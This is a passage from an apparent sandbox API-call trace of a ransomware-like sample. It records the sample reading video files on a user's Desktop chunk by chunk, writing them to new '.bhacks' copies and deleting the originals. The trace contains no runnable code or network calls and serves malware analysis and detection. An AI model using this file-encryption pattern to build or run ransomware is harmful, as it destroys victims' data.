dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0066.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0066.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0066.378] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks", lpFilePart=0x0) returned 0x27 [0066.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.379] GetFileType (hFile=0x324) returned 0x1 [0066.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.379] GetFileType (hFile=0x324) returned 0x1 [0066.469] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4", lpFilePart=0x0) returned 0x20 [0066.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0066.470] GetFileType (hFile=0x33c) returned 0x1 [0066.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.470] GetFileType (hFile=0x33c) returned 0x1 [0066.470] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.474] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.474] WriteFile (in: hFile=0x324, lpBuffer=0x2518978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2518978*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.476] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.476] WriteFile (in: hFile=0x324, lpBuffer=0x2518978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2518978*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.476] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.476] WriteFile (in: hFile=0x324, lpBuffer=0x2518978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2518978*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.477] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x54f, lpOverlapped=0x0) returned 1 [0066.477] WriteFile (in: hFile=0x324, lpBuffer=0x2518978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2518978*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.477] ReadFile (in: hFile=0x33c, lpBuffer=0x2517760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2517760*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0066.477] CloseHandle (hObject=0x33c) returned 1 [0066.477] WriteFile (in: hFile=0x324, lpBuffer=0x2518978*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x2518978*, lpNumberOfBytesWritten=0x6fea68*=0x550, lpOverlapped=0x0) returned 1 [0066.477] CloseHandle (hObject=0x324) returned 1 [0066.479] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4", lpFilePart=0x0) returned 0x20 [0066.479] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4")) returned 1 [0066.480] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks", lpFilePart=0x0) returned 0x36 [0066.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.480] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.480] GetFileType (hFile=0x324) returned 0x1 [0066.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.480] GetFileType (hFile=0x324) returned 0x1 [0066.492] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4", lpFilePart=0x0) returned 0x2f [0066.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0066.492] GetFileType (hFile=0x33c) returned 0x1 [0066.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.492] GetFileType (hFile=0x33c) returned 0x1 [0066.492] ReadFile (in: hFile=0x33c, lpBuffer=0x261a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x261a2b8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.492] ReadFile (in: hFile=0x33c, lpBuffer=0x261a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x261a2b8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.493] WriteFile (in: hFile=0x324, lpBuffer=0x261b4d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x261b4d0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.494] ReadFile (in: hFile=0x33c, lpBuffer=0x261a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x261a2b8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.494] WriteFile (in: hFile=0x324, lpBuffer=0x261b4d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x261b4d0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.494] ReadFile (in: hFile=0x33c, lpBuffer=0x261a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x261a2b8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.494] WriteFile (in: hFile=0x324, lpBuffer=0x261b4d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x261b4d0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.495] ReadFile (in: hFile=0x33c, lpBuffer=0x261a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x261a2b8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.495] WriteFile (in: hFile=0x324, lpBuffer=0x261b4d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x261b4d0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.665] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.665] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.666] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.666] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.666] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.666] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.667] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.667] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.667] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.667] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.668] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.668] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.668] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x5e3, lpOverlapped=0x0) returned 1 [0066.668] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.668] ReadFile (in: hFile=0x33c, lpBuffer=0x24bd330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bd330*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0066.669] CloseHandle (hObject=0x33c) returned 1 [0066.669] WriteFile (in: hFile=0x324, lpBuffer=0x24be360*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24be360*, lpNumberOfBytesWritten=0x6fea68*=0x5f0, lpOverlapped=0x0) returned 1 [0066.669] CloseHandle (hObject=0x324) returned 1 [0066.671] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4", lpFilePart=0x0) returned 0x2f [0066.671] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4")) returned 1 [0066.723] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks", lpFilePart=0x0) returned 0x2b [0066.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.723] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.725] GetFileType (hFile=0x324) returned 0x1 [0066.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.725] GetFileType (hFile=0x324) returned 0x1 [0066.811] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4", lpFilePart=0x0) returned 0x24 [0066.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0066.811] GetFileType (hFile=0x33c) returned 0x1 [0066.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.811] GetFileType (hFile=0x33c) returned 0x1 [0066.811] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.816] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.816] WriteFile (in: hFile=0x324, lpBuffer=0x26029e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x26029e8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.817] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.817] WriteFile (in: hFile=0x324, lpBuffer=0x26029e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x26029e8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.818] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.818] WriteFile (in: hFile=0x324, lpBuffer=0x26029e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x26029e8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.818] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.818] WriteFile (in: hFile=0x324, lpBuffer=0x26029e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x26029e8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.819] ReadFile (in: hFile=0x33c, lpBuffer=0x26017d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26017d0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.819] WriteFile (in: hFile=0x324, lpBuffer=0x26029e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x26029e8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.821] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.822] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.822] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.822] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.822] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.823] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.823] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.823] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.823] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x113, lpOverlapped=0x0) returned 1 [0066.823] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.824] ReadFile (in: hFile=0x33c, lpBuffer=0x24bf980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24bf980*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0066.824] CloseHandle (hObject=0x33c) returned 1 [0066.824] WriteFile (in: hFile=0x324, lpBuffer=0x24c09b0*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24c09b0*, lpNumberOfBytesWritten=0x6fea68*=0x120, lpOverlapped=0x0) returned 1 [0066.824] CloseHandle (hObject=0x324) returned 1 [0066.826] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4", lpFilePart=0x0) returned 0x24 [0066.826] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4")) returned 1 [0066.827] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4.bhacks", lpFilePart=0x0) returned 0x45 [0066.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.827] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\uqu-sqkb\\kzhwidny.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.827] GetFileType (hFile=0x324) returned 0x1 [0066.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.827] GetFileType (hFile=0x324) returned 0x1 [0066.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4", lpFilePart=0x0) returned 0x3e [0066.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.916] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\uqu-sqkb\\kzhwidny.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0066.916] GetFileType (hFile=0x33c) returned 0x1 [0066.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.916] GetFileType (hFile=0x33c) returned 0x1 [0066.916] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.921] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.921] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.922] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.922] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.922] ReadFile (in: hFile=0x33c, 